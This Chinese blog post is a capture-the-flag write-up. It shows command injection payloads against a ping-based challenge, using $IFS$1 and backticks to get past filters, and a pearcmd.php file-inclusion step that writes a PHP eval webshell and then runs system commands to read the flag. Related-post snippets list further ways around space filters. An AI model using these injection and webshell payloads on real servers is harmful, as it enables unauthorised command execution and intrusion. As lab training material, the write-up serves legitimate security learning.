BUUCTF [GXYCTF2019]Ping Ping Ping easywill

已于 2022-09-24 18:43:43 修改
阅读量674 收藏
点赞数
分类专栏: BUUCTF 文章标签: php 网络安全 安全 开发语言
于 2022-09-24 18:36:37 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_62107966/article/details/127018372
版权

题目地址:BUUCTF在线评测

考点:ping命令相关命令执行

这里过滤了flag和空格

绕过空格可以使用

$IFS$1

使用ls命令查询目录

?ip=127.0.0.1;ls

发现有两个文件,一个是flag.php,另一个是index.php。

cat获取文件内容,过滤了flag,所以flag.php无效,但可以访问index.php,查看源码

?ip=127.0.0.1;cat$IFS$1index.php

过滤了很多东西,包括flag。

可以使用反引号是作为内联执行,`ls`即可解释为输出index.php以及flag.php的内容,那么flag就可以输出出来了。

?ip=127.0.0.1;cat$IFS$1`ls`

访问源代码:

拿到flag.

flag{8b1f0054-5f92-402d-ad1a-ecc5ebcf0777}

[HXBCTF 2021]easywill

利用pearcmd.php进行文件包含。

在burpsuite里抓包将参数传进去,然后再放包,不然<>会被url编码,导致写入的一句话木马失效。

?name=cfile&value=/usr/local/lib/php/pearcmd.php&+config-create+/<?=eval($_POST[0])?>+/tmp/aa.php

接着访问:

?name=cfile&value=/tmp/aa.php

POST传参:

0=system('ls /');

命令执行查看目录,知道flag在

flag32897328937298hdwidh下面

 

直接拿flag:

0=system('cat /flag32897328937298hdwidh');

泪涌@
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF中ping文件执行漏洞无回显反弹拿flag
拉风的鲨鱼的博客
03-31 9460
打开网页内容如下 我们来看一下核心代码 <?php include_once "code.txt"; if (isset($_POST['ip'])) { $p=$_POST['ip']; if(preg_match("/(;|`|&| |\\$|python|ruby|perl...
CTF入门笔记之ping
qq_37410729的博客
11-02 4139
1.用命令行找flag文件 随便ping,然后跟ls 例如:1;ls 发现index.php文件 1;cat index.php 查看发现就是源网站。 那就向上找 1;ls …/ 继续向上找 直到1;ls …/…/…/ 发现flag 打开 1;cat …/…/…/flag 得到flag 2.绕过过滤打开文件 同样,先查看目录 payload:?ip=1;ls 发现两个文件,尝试直接打开index文件(虽然知道肯定不行) payload:?ip=1;cat index.php 果然不行
CTF演练---ping
最新发布
2301_78637299的博客
06-06 435
CTF演练---ping--->只需要输入ip,就可以获取到你想要的
CTF——ping相关
jklw4的博客
09-12 4247
Ping PING (Packet Internet Groper),因特网包探索器,用于测试网络连接量的程序 [1] 。 Ping是工作在 TCP/IP网络体系结构中应用层的一个服务命令, 主要是向特定的目的主机发送 ICMP(Internet Control Message Protocol 因特网报文控制协议)Echo 请求报文,测试目的站是否可达及了解其有关状态 [2] 。 检测是否可以注入 127.0.0.1;whoami 如果存在注入,得到的结果是“www-data” ping 题目
CTF关于ping命令注入问题(1)
热门推荐
欢迎来到神林的博客
03-07 1万+
题目样式 对于看到ping或者ping命令却没有弄waf时就要想到命令注入。 具体注入方法 看到ping命令就可以利用截断来执行新的命令。 首先测试所有的截断符号: ‘$’ ‘;’ ‘|’ ‘-’ ‘(’ ‘)’ ‘反引号’ ‘||’ ‘&amp;&amp;’ ‘&amp;’ ‘}’ ‘{’ '%0a’可以当作空格来用; 利用截断符号配合普通命令简单问题基本就出来; 例如:ip=127.0.0.1...
ctf-ping命令执行
qq_45414878的博客
11-08 9499
[GXYCTF2019]Ping Ping Ping 现在做一下关于常见的绕过ping执行其他命令的姿势,启动环境,连接并输入参数,查看当前目录下都有什么 ls命令没有被过滤,并且知道flag就在这个目录下面,用cat查看的flag的时候发现空格被禁用,绕过空格常用的方法有 {cat,flag.php} cat${IFS}flag.php cat$IFS$9flag.php cat<flag.php cat<>flag.php kg=$'\x20flag.php'&&c
LabVIEW实现网络Ping IP测试
07-10
在这个“LabVIEW实现网络Ping IP测试”的项目中,我们可以通过LabVIEW编写程序来模拟操作系统中的ping命令,对指定的IP地址进行连通性检测。 **一、LabVIEW基础知识** 1. **图形化编程**:LabVIEW采用G语言...
Linux批量pingIP地址
05-17
在Linux系统中,通过shell脚本读取IP列表,进行批量ping操作,并记录结果
Ping命令实现的扩充
09-27
实验内容:Ping命令实现的扩充,在给定的Ping程序的基础上做如下功能扩充: ? -h 显示帮助信息 ? -b 允许ping一个广播地址,只用于IPv4 ? -t 设置ttl值,只用于IPv4 ? -q 安静模式。不显示每个收到的包的分析结果,...
批量PingTelnet检测
12-25
批量Ping和Telnet检测是网络管理员常用的两种网络连通性检查工具,它们在IT领域中扮演着重要角色,尤其在大型网络环境中。批量检测能够大大提高工作效率,帮助快速定位网络问题。 **批量Ping检测** 批量Ping检测是...
Labview ping IP.vi
01-07
通过程序来ping设备的IP地址,这样就可以确认当前设备是否已经正确连接到电脑。在连接设备之前可以判断
BUUCTF-Ping Ping Ping
m0_47571887的博客
11-07 106
打开题目,emm我们试试用get方式提交一下 用url/?id=127.0.0.1;ls 查看一波flag,url/?id=127.0.0.1;cat flag.php ???貌似过滤掉了,那我们看看index.php 好像是把空格过滤掉了,这里我用了很多方法进行绕过,发现只有第四种可以绕过 1、<> 2、%20(space) 3、%09(tab) 4、$IFS$9、 ${IFS}、$IFS 这里好像也把flag给过滤了,我们去看看index.p..
buuctf-ping ping ping
m0_62094846的博客
11-15 642
ping地址成功了,再看看目录 直接有flag,尝试使用,但是过滤了空格 绕过空格方式 cat flag.txt cat${IFS}flag.txt cat$IFS$9flag.txt cat<flag.txt cat<>flag.txt (28条消息) Linux下绕过空格的方式总结_北陌的CSDN博客-CSDN博客_空格绕过 一个个尝试 发现t$IFS$9有用 但是又过滤了flag,那没有办法再绕过了,只能试试index.php 可...
BUUCTFPing Ping Ping
金 帛的博客
02-20 6672
BUUCTFWP,关于一些waf的绕过
CTF利用工具探测尝试获取Flag
网站安全专家
03-04 4780
接下来咱们就使用攻击工具来探测一下靶场机器的这个服务信息。这里我们使用MFSV也就是探测服务端口,然后加上靶场的IP地址。下面我们回到kali linux进行探测。首先 Nmap -sv 192.168.213.10回车,这时候我们靶场机器,就被我们这kaili正在探测,探测还是比较快的,这里我们看到它开放了一些服务,比如说SSH服务以及HTTP服务,开放了两个HTTP服务。 这时候我们探测完毕,在探测结束之后,我们需要对探测结果进行分析,这里我们提前给大家说一个知识点,就是每一个服务对应计算机的一个
[GXYCTF2019]Ping Ping Ping
satasun的博客
05-21 5893
打开链接,页面提示/?ip= 猜测本题的意思是让我们把这个当做变量上传参数。 先输入127.0.0.1 看来把我们上传的东西当做ip来执行ping操作。 试试看能不能利用一下管道: ?ip=127.0.0.1;dir 诶,不行,dir是windows下的,说不定服务器是linux的 ?ip=127.0.0.1;ls 出现了flag.php,那么简单的? cat flag.php走起 ?ip=127.0.0.1;cat flag.php 嗯?过滤空格? 过滤空格的解决办法如下 $IFS ${IFS} $I
CTF题目pingpingpongpong--获取flag
weixin_52937457的博客
03-17 1630
ctf获取flag入门
[GXYCTF2019]Ping Ping Ping 1
weixin_45674567的博客
07-08 1314
直接尝试:/?ip=127.0.0.1;ls; 看到flag.php,尝试读取:他提示不能有空格,绕过试一试: 尝试,回显/?ip= 1fxck your symbol!表示出现了非法字符,发现能代替空格的/**/、%0a、IFS等都被过滤了,但{IFS}等都被过滤了,但IFS等都被过滤了,但IFS9还可以使用,于是/?ip=127.0.0.1;cat9还可以使用,于是 /?ip=127.0.0.1;cat9还可以使用,于是/?ip=127.0.0.1;catIFS$9flag.php; 又说不能出现..
中学生CTF 平台Ping Write Up
Ju0se
04-05 3248
地址:http://198.13.45.199:5005/ 明显是一道命令执行的题目。 来说一下被ban的内容都有啥。 ls、cat、flag、php、>、| 以及数字点和空格 通过反引号包裹whoami后成功执行。 此时需要通过a="l";b="s";c=$a$b;$c来执行ls命令。 同时还需要包含在反引号内 127.0.0.1;`...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值